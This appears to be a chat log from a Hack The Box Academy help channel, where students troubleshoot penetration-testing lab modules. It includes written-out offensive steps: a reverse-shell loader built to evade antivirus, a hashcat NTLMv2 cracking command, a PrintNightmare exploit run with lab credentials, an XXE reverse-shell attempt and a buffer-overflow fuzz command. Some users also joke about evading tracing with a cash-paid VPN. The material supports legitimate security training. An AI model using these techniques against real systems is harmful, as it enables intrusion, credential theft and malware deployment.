maybe this will help https://gist.github.com/Xre0uS/2105986d23719cf99c271842528f48a6
Measures latency to all HTB academy servers, requires ping3 module - measure-academy-latency.py
but if the problem is their own internal network then 
thank you
This floor is made of floor
but yeah it's funny, but some people do need it spelled out
i feel like if you need it spelled out that Network File System is a network file system then you might not be cut out for cpts
USING WEB PROXIES > Burp Intruder > Question 1
https://academy.hackthebox.com/module/110/section/1054
I'm getting errors when fuzzing for HTML files. I think it might be because I'm connected to the webpage over HTTPS instead of HTTP. But I could not connect to the webpage over HTTP.
https isn't running on those servers afaik
you'll get a 4xx error on all the ones that don't contain the answer
https://academy.hackthebox.com/module/113/section/1210
need help, the joomla_dir_trav.py script runs from python2.7. when i run the command as demonstrated it says it's missing click. so i do sudo pip install click and it says it already exists in /usr/lib/python3/dist-packages (8.1.7). i can't run it with python3, i get a separate error
i just read... there's a py3 ver of the script
Weird, the webpage doesn't render any content over HTTP. I can only connect over HTTPS.
well because you need to find the <x>.html file
it's not loading bc no index.html :)
or default .html page that it's loading
Oh okay that makes sense.
if all else fails, reset the target
I'll give it another try.
but https will always fail as there's no SSL services running
Ok it's working now. Thank you.
At first I couldn't capture an HTTP request over Burp because I was trying to load a non-existent page. After I loaded a page that exists I was able to intercept the HTTP request.
it's generally asking you to visit the base page
http://ip:port
then perform the attack described from that
Yeah but when I went to http://ip:port I didn't capture any request in Burp Suite, because the page did not exist.
Hey @shut quest, I'm working on INTRODUCTION TO WINDOWS EVASION TECHNIQUES - Dynamic Analysis - Option 2 with microShell. In the example given, it looks like they ran the program from Administrator Powershell. In the Introduction chapter, we are given a target VM that provides us with Administrator privileges, but not in the chapter I am in, Dynamic Analysis. Do I use the Introduction VM given, or the one in Dynamic?
ah
Should still work without admin
it loaded, just didn't load what you expected
if it didn't load/connect there'd be an error message in the browser
If anything the author was showing it work on the dev machine (cooking atm so I can verify)
@shut quest Gotcha, so I just drop it into the C:\alpha\dynamic folder and it will be run.
Correct
Okay then it must be something with my code or something else. Thank you
Originally I wasn't capturing any request in Burp Suite at the base URL but now I'm able to. I probably just had to reset my target. All good now.
@shut quest Here are the steps I did for option 2. (I did get option 3 working, and wrote my own reverse shell, but using micr0shell is harder for me)
- Take the NotMalware code from Static Chapter
- Generate a shell with IP and Port of attack VM
- Take the hex and convert it to an AES-base64 string
- Put this string in place of the meterpreter AES-base64 string
- (Optional) Add the iv and key for the aes decryption (though these appear to be unchanged from CyberChef)
- set netcat on attacker VM and listen on 8080.
- compile, transfer to victim, insert into C:\alpha\dynamic. Verify it runs via log.txt
- Wait for connection from victim.
Did I miss a step? I might just burn it all down and try again tomorrow if everything looks right.
is there someone who can help me read through the report in the documenting and reporting section? it's difficult to know where to start and what to take screenshots and notes on. it's all over the place. i was able to get into the dc01 host but i failed to document as i went. but everything was still up so i could capture it
would be awesome if someone could walk me through so i can get a different point of view on learning this portion
I'm in the information gathering-web edition skill assessment, and the problem I'm running into is when I run any of my tools dig, dnslookup, Whois, I get either no results or unable to find server. I added the ip and web page to my host file and am able to find the web page in the browser but none of my other tools are pulling any results.
Did they give any specific websites for you to collect info on?
it's not a public domain, so you won't find it with nslookup or whois
also don't include the port number in your host file
You need to add the IP (without port) and Domain to your hosts file.
Try running whois on "inlanefreight.com"
Sorry just not making any sense on why they say to use those then not make it to where you can
the hosts file is only responsible for name resolution. This has nothing to do with the port
look at the first question carefully
Changed the host file without the port, still no results
That's because inlanefreight.htb is not a real domain
htb is not an official top level domain
I've answered all but the last question and I did it from my personal machine. I'm using the attack box cause not at home
I did .com instead of htb
After modifying the host file without the port
What question exactly are you trying to answer?
The final one, what is the API key the inlanefreight.htb developers will be changing to?
You have found a subdomain. From there, apply all the techniques shown in the module again. Then you will also find what you are looking for
if you can't find something on one subdomain, perhaps dig deeper
The new information gathering module is really well done. Forces you to think outside the box a bit
ReconSpider comes in clutch
had that working for .com but not .htb past q3 in skill assessment
"if you can't find something on one subdomain, perhaps dig deeper"
What have you tried?
make sure to remove line breaks, 5 is not optional as you need that to decrypt, 6 is whatever port you stated so if 8080 cool, else modify. did you clean up the xor?
read what I said previously; if you can't find on one -- dig deeper
I went deeper and got it done
π
but also ReconSpider won't work on the first subdomain
it's not set up in that way
So I haven't answered the final question and it gave me 19/19 on the course
well if you can't click on "finish" at the end of the module, then it's not complete
and it won't count as completed
It just shows view instead of continue
Does anyone have the silver annual ? I was going to purchase to assist with the CPTS and was wondering if it was worth it?
only if you find yourself getting heavily stuck and don't wanna reach out for help in the discord
¯\_(ツ)_/¯
the walkthroughs mostly assume you read the content or have underlying knowledge of a concept that's required for the module
I was trying to finish as quickly as possible without bugging everyone lol.
finishing quickly should not be the goal
So only the annual provides the step by step solutions, not the monthly.....
you should have learned and understood all the techniques and tools used throughout the entire course
yes
you can't copy/paste your way to the CPTS certification
Ok....I'm going to go ahead and get it.
I know I can't.
you should focus on where you got stuck and understanding what you misunderstood/needed to add to get unstuck
Have you passed it?
getting stuck is natural, but if your immediate reaction to getting stuck is "what's the answer" then you're just setting yourself up for failure
if you rely on using that feature to do modules it won't help with your learning
Right
you need to be able to think critically
I genuinely only use the guides for one of two things; 1) if i've already asked and I just didn't get anywhere with the hints and 2) to see if the guide does something different than me
it's all in how you actually use the tool
but it's absolutely not necessary ¯\_(ツ)_/¯
plenty of people passed without the guides being a thing at all
Ok. Thanks for the insight.
(except for enterprise)
so if you truly feel you need a guide to move forward, take a step back and slow down your reading
and also TAKE NOTES
taking notes is THE most important thing
you're not expected to memorize every little syntax
just understanding what tool you need is more than enough
the rest can be googled or saved as a shortcut for later
I did.
I have been stuck in the login ssh brute force question on the module.
The only reason I wanted the silver annual was because I wanted to make sure I understand EACH section completely
you get better answers in here with
- Module name - Section Name
- What question
- what you're stuck on/what you've tried
the walkthroughs don't explain anything, at all
they are based off the assumption you read the content
Is anyone available for help on the the Active Directory Trust Attacks module abusing ADCS? I'm confused on what I'm supposed to do and may be messing up the attack chain.
you'll need to understand the previous section first. but basically just create a vulnerable template, push it to the parent domain then request it
All from DC02 right?
So nowhere in the attack chain do you need access to DC01? I've been following the steps, but I keep getting an error about the default policy module blocking the cert. It's like it doesn't sync after it's added to active enrollment.
Can I DM you to share a screenshot of the error I'm getting? @next bronze
request the cert from dc01 after it's been published, you can just send the screenshot here
Nevermind, figured it out. I either forgot to hit apply somewhere or it just needed time to sync.
@next bronze you here?
I keep having an issue with multidump
it says "The magic bytes are not zero! Probably wrong file/key used, or data lost during transfer." and I don't know how to debug it
if the data is transferred over a proxy you'll need to give the handler the proxy's ip
but this is not the right channel, use #red-team or something
it's to be able to circumvent slow mode
"It's TheCyberSimon the Lord of skids"
bc of how discord perms work
my bad, thanks
Attacking Common Services -> SQL.
"What is the password for the "mssqlsvc" user?"
How can I possibly crack this hash or use it?
It looks like an NTLM hash
I mean it should be NTLM but I can't see it
Is it the FC.....78 part?
the whole thing from mssqlsvc all the way to the end is the hash
search for NTLMv2
:)
Ah okay, I thought of using online rainbow tables to crack it but maybe that won't be possible since its NTLMv2? :-)
hashcat -m 5600 -a 0 -o cracked.txt ntlmv2_hash.txt /path/to/wordlist.txt
the module should give you a wordlist
if not; rockyou
Yup, but NTLMv2 is not possible to use crackstation etc?
Crackstation does support NTLM
it does... but that's not what the module wants you to do
read the section
you're meant to use tools
as crackstation only uses popular/known words
You can use hashcat, the password is most likely in rockyou.txt
if it's not in their list guess what, crackstation won't find it
then what will you do?
Gotta apply braincells to problems my boi
Thanks for the help both
Hi, I am doing
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities
I am trying to do the steps shown on "PrintNightmare" vulnerability. So far, I have
- Verified that the server is vulnerable
- Generated a reverse shell DLL payload
- Started a smbserver
sudo smbserver.py -smb2support Payload "/home/htb-student/backupscript.dll"
- Started a listener using metasploit
The problem is with the SMB server. When I run the exploit, I get the error
└──╼ $sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\PAYLOAD\backupscript.dll'
python3: can't open file '/home/htb-student/CVE-2021-1675.py': [Errno 2] No such file or directory
But the backupscript.dll file exists:
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $ls -l /home/htb-student/backupscript.dll
-rw-r--r-- 1 htb-student htb-student 8704 Jul 11 02:23 /home/htb-student/backupscript.dll
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $ls -ald /home/htb-student/
drwxr-xr-x 1 htb-student htb-student 558 Jul 11 02:23 /home/htb-student/
When trying to execute the ls command with smbclient as well, I get a NO_SUCH_FILE error:
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $smbclient -N //172.16.5.225/Payload
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
Can anyone point out what I am doing wrong during SMB server set up step?
Try just the path for the share instead of the file
(gdb) run $(python -c "print '\x55' * 1200") is there another command in gef or gdb for this? I can't get it to overwrite the eip and ebp?
I've tried to get python 2 with pyenv but it needed a package I searched forever to find and I can't get it installed. openSSL-dev1.0 needed for python 2.
This is for the linux buffer overflow module in the academy.
Thanks, it worked!
Good morning to all. I have a question regarding reverse shells in python. When you do sudo python3 -m http.server 80 to create a shell it is indicated that it is listening on the ip 0.0.0.0. Is this the IP I have to include or is it the IP of my box (this time it is the VPN IP as we are on a VPN)?
that's not a shell. that's you creating a HTTP server on the machine you typed that in
Correct
sudo python3 -m http.server does not create a reverse shell. That's just a python server
I am injecting a php one line reverse shell to get the response there
agreed my mistake
if you are downloading a file from your new http server, you need to use the IP of the box. the 0's is just a local host IP not your IP on the network
using 'ifconfig' or 'ip a' to find your IP is best
it'll be 10.10.xx.xx most likely, under the tun0 interface
0.0.0.0 means the machine is serving on all interfaces
yes indeed
(tun0 is tunnel interface 0, the VPN for the connection via your VM)
Ok nice to know that
OK got it. Thank you guys for your prompt response.
Are you trying to serve a reverse shell on your computer for a specific target?
yes. I am trying to inject an XXE vulnerability with curl to download my xee.php one liner to get a reverse shell. But I can't make it work.
Shouldn't I be able to just login with the svc account after cracking the pw? Tried multiple times
Oh okay. So in that case yes you should run a http server on your end. On your one liner payload, you have to enter your tun0 IP:port
Did that but still don't get an answer back. hahahah Maybe it is not vulnerable with the expect entity?
Unless you start the HTTP in / you might want to change the path in your payload.
Hi ! I'm working on the "INTRO TO WHITEBOX PENTESTING" module - section Skills Assessment.
I've found one of the RCE method but looking for the second one.
Does anyone can nudge me?
Yeah
will put it on the /
Did you test for vulnerability?
uh php payload need php server?
Yup then it should work
going back. will let you know how it goes amigooos :D
Did you crack the password?
I moved the file to / . then I tried the curl command normally in terminal and the file was downloaded and saw the result in the Python webserver. When doing this I get no response though. Could it be the ' ' needs to be encoded?
Are you listening for the rev shell?
yes
you try using sqsh?
Curl command done outside the BURP request and we can see results in the web server waiting on the other side.
No I found it awful, but since it works with the provided account I believe it should work with the service account too - wdyt?
Yes
Try logging in with sqsh
you can try -windows-auth
Yeah it could actually be that it's not set to the correct authentication method
what module / section are you working on?
You haven't added the port to your command?
What port are u running the http server on?
The module is the Web Attacks for XXE, the first exercise. The exercise was done without the reverse shell. I am just trying to see if I can get the reverse shell to work.
it is port 80. I tried the injection with IP:80 and without 80 and I get the same result
will try again :D
Ah yes that did it! Thanks both.
Wondering why it worked without -windows-auth for the provided account..
Does anyone know why my command returns such an error? How do I fix it?
-windows-auth
You are using python3 and the example uses 2.7
As stated you're missing the parenthesis for print
I've tried to get python 2.7 with pyenv but it won't install it because of an openssl dependency package
It's a syntax error you need to make it python -c "print('\x55' * 1200)"
It's ok, I found the issue, thanks
Thanks again y'all
Getting another syntax error. I haven't done much of python interpreter bashing.
I might need to go practice syntax with bash.
The syntax error is with python not bash
Try python -c "print('\\x55' * 1200)"
Not working with that syntax either.
I think I might really have to get python 2.7 on here
Aren't you meant to do run $(python -c "print('\x55'*1200)") ?
Yeah but also the single quotes around '\x55' could be causing problems because of how the shell and GDB are interpreting the command.
¯\_(ツ)_/¯
here it is with the main command
Again you need ()
^
Wrap the python print statement in the ()
It even tells you how to fix it in the error
That's python 2
And this is based in 2.7
Or adjust
pyenv
Brother
Try running run $(python -c "print('\\x55' * 1200)")
Don't need double \
They are telling you the syntax for 3, the section is showing for 2, adjust your code to match for 3
Because it wants to inject "U" in (hex 55)
worked ty
Ty
The error literally says "did you mean fixed statement?"
That's literally the command I gave you earlier
Thank you both so much! I'll work on understanding the syntax
Not to mention it literally told him how to fix
Yeah lol
Yeah it was literally just syntax
Dude
Look at this screenshot again
And read the syntax error line
I missed the '('
Lol
This isn't just about missing parenthesis, it's literally about reading the error it gives
oh I just didn't know to put the other ) at the end
Literally how every function works
LOL sorry yall
Also that wasn't my point now
We've gotten you to write it correctly
But you aren't acknowledging the neon sign that would have saved you some headache
I see it, now xD
I recommend you learn some coding
going right now to study some more python.
Yeah in order to fuzz and debug code, you need to know code
We're not sharing random IPs
And login forms
Do it again and you'll be gone before you can say "buffer overflow"
Read the #rules
Alright my bad I was about to say i got an xss on that site
Brother
don't scare us like that
Still not wise to share
scared me xD
Report and earn some of that sweet bug bounty
Come on guys we can have a bit of fun now
Not all the time ethical
Not illegally
I say you report it to the website owners or whoever is in charge
^
We don't share potentially vulnerable websites to others
Especially since someone smarter than you could potentially do way more harm
Yes all the time ethical /story
You keep pushing the issue and you can get removed
This channel is for the htb academy learning modules
Not "I'm a skid and found xss on this random ip"
Not to mention you don't know if that sites a honeypot and logged your ip
Brother errrr
So I suggest dropping the issue
Mullvad vpn
Now go bug somewhere else
and thats why u pay cash with mullvad 
Next time read #rules before trying to post a random ip
Even paying cash, entities can request records. Especially if they're investigating a security incident
ya but cash doesnt trace back to u
I'm on Attacking Common Services for SMB and I've got no idea how to get jason's pw. I've enumerated users, found a share that I can't access because of insufficient perms, and I've used the pws.list given in the module to brute force the password, and none of them work. I tried a mutated list of that, and then rockyou as well, still nothing, what do i do???
Common services doesn't use a mutated list
I know, but I made one anyway because the regular one isn't working
anyone else have this dark reader spam on pwnbox?
The pws.list from resources should work
could have sworn i tried it with --local-auth yesterday, worked now, thanks
whats the hardest machine to pwn on hackthebox?
Magic gardens?
Should probably ask in a not academy channel
Hello, just a quick question, I am currently doing the file transfer module and for some reason xfreerdp doesn't connect to the target. The error message is "Timeout waiting for activation". tried adding the /timeout:1000 and /cert:ignore but to no avail, tried also using rdesktop and remmina. Double checked the IPs and credentials, refreshed the target as well, still no luck. Any tips?
that's in ms, try setting it longer
you can dm if you still need help with it
anyone around for a nudge on Abusing HTTP Misconfiguration Hard Skill Assessment? Found some stuff but unable to move forward. thanks in advance.
anyone got an issue with spawning targets ? I get "Target(s) are spawning..." for a few seconds, then goes back to "Click here to spawn target system !" it was working just fine few hours ago
Same
im having trouble right now as well
ight good to know its not just me
im on eu5
Well I'm on the app boxes but yeah VPN just tanked
but i imagine we're all on different networks lol
i tried using UDP, TCP and new files, restarting my vm rn
im doing web attacks/xxe
I tried both vip vpns and no joy
i was about to switch vpns but saw msgs in chat
damn...i really wanted to finish the module before bed. i have a lot of life stuff about to get in my way hahaha
real, i got work soon
oh it works i think
ya works for me again after restarting vm
yeah still can't spawn the target anymore, guess I will reach to support
Hello,
Module Footprinting
Section Footprinting Lab - Easy
I can't spawn the target anymore, anyone knows why ?
It stays stuck on "Target(s) are spawning..." for a while, then it resets to "Click to spawn the target".
yeah same here bud
Suggestion: update module: Vulnerability Assessment
Section: CVSS from v3.1 to v4
https://www.first.org/cvss/v4-0/
Even the official first.org site archived all CVSS below 3.1 tbh
I think it's worth updating this knowledge too.
Same here, I can't spawn a target anymore since about 30 minutes
My target was suddenly unreachable, and since I tried to restart it, it's impossible to start a new target.
Usually spawning a target from another chapter, then spawning the target from my current chapter works, but here even this doesn't work
ok global platform issue it seems, maybe no more resources